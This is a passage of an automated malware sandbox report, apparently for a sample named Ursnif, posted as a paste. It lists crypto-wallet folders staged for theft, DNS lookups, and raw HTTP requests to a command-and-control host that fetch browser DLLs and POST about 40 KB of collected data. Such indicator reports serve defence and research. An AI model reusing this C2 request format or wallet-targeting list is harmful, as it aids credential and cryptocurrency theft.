  651. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin",
  652. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash",
  653. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum",
  654. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC",
  655. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum",
  656. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus",
  657. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin",
  658. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko",
  659. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin",
  660. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD",
  661. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin",
  662. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin",
  663. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin",
  664. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX",
  665. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin",
  666. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin",
  667. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin",
  668. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge",
  669. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin",
  670. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin",
  671. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin",
  672. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin",
  673. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash",
  674. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets",
  675. "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
  676. "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe"
  677.  
  678.  
  679. * Modified Registry Keys:
  680. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type"
  681.  
  682.  
  683. * Deleted Registry Keys:
  684.  
  685. * DNS Communications:
  686.  
  687. "type": "A",
  688. "request": "otnet.xyz",
  689. "answers":
  690.  
  691. "data": "209.141.47.33",
  692. "type": "A"
  693.  
  694.  
  695.  
  696.  
  697. "type": "A",
  698. "request": "ip-api.com",
  699. "answers":
  700.  
  701. "data": "72.11.140.50",
  702. "type": "A"
  703.  
  704.  
  705. "data": "66.212.29.250",
  706. "type": "A"
  707.  
  708.  
  709.  
  710.  
  711.  
  712. * Domains:
  713.  
  714. "ip": "209.141.47.33",
  715. "domain": "otnet.xyz"
  716.  
  717.  
  718. "ip": "72.11.140.50",
  719. "domain": "ip-api.com"
  720.  
  721.  
  722.  
  723. * Network Communication - ICMP:
  724.  
  725. * Network Communication - HTTP:
  726.  
  727. "count": 1,
  728. "body": "--1BEF0A57BE110FD467A--\r\n",
  729. "uri": "http://otnet.xyz/141",
  730. "user-agent": "",
  731. "method": "POST",
  732. "host": "otnet.xyz",
  733. "version": "1.1",
  734. "path": "/141",
  735. "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  736. "port": 80
  737.  
  738.  
  739. "count": 1,
  740. "body": "",
  741. "uri": "http://otnet.xyz/freebl3.dll",
  742. "user-agent": "",
  743. "method": "GET",
  744. "host": "otnet.xyz",
  745. "version": "1.1",
  746. "path": "/freebl3.dll",
  747. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
  748. "port": 80
  749.  
  750.  
  751. "count": 1,
  752. "body": "",
  753. "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
  754. "user-agent": "",
  755. "method": "GET",
  756. "host": "otnet.xyz",
  757. "version": "1.1",
  758. "path": "/freebl3.dll?ddosprotected=1",
  759. "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  760. "port": 80
  761.  
  762.  
  763. "count": 1,
  764. "body": "",
  765. "uri": "http://otnet.xyz/mozglue.dll",
  766. "user-agent": "",
  767. "method": "GET",
  768. "host": "otnet.xyz",
  769. "version": "1.1",
  770. "path": "/mozglue.dll",
  771. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  772. "port": 80
  773.  
  774.  
  775. "count": 1,
  776. "body": "",
  777. "uri": "http://otnet.xyz/msvcp140.dll",
  778. "user-agent": "",
  779. "method": "GET",
  780. "host": "otnet.xyz",
  781. "version": "1.1",
  782. "path": "/msvcp140.dll",
  783. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  784. "port": 80
  785.  
  786.  
  787. "count": 1,
  788. "body": "",
  789. "uri": "http://otnet.xyz/nss3.dll",
  790. "user-agent": "",
  791. "method": "GET",
  792. "host": "otnet.xyz",
  793. "version": "1.1",
  794. "path": "/nss3.dll",
  795. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  796. "port": 80
  797.  
  798.  
  799. "count": 1,
  800. "body": "",
  801. "uri": "http://otnet.xyz/softokn3.dll",
  802. "user-agent": "",
  803. "method": "GET",
  804. "host": "otnet.xyz",
  805. "version": "1.1",
  806. "path": "/softokn3.dll",
  807. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  808. "port": 80
  809.  
  810.  
  811. "count": 1,
  812. "body": "",
  813. "uri": "http://otnet.xyz/vcruntime140.dll",
  814. "user-agent": "",
  815. "method": "GET",
  816. "host": "otnet.xyz",
  817. "version": "1.1",
  818. "path": "/vcruntime140.dll",
  819. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  820. "port": 80
  821.  
  822.  
  823. "count": 1,
  824. "body": "--1BEF0A57BE110FD467A--\r\n",
  825. "uri": "http://ip-api.com/line/",
  826. "user-agent": "",
  827. "method": "POST",
  828. "host": "ip-api.com",
  829. "version": "1.1",
  830. "path": "/line/",
  831. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  832. "port": 80
  833.  
  834.  
  835. "count": 1,
  836. "body": "",
  837. "uri": "http://otnet.xyz/",
  838. "user-agent": "",
  839. "method": "POST",
  840. "host": "otnet.xyz",
  841. "version": "1.1",
  842. "path": "/",
  843. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40736\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
  844. "port": 80
  845.  
  846.  
  847.  
  848. * Network Communication - SMTP:
  849.  
  850. * Network Communication - Hosts:
  851.  
  852. * Network Communication - IRC:
RAW Paste Data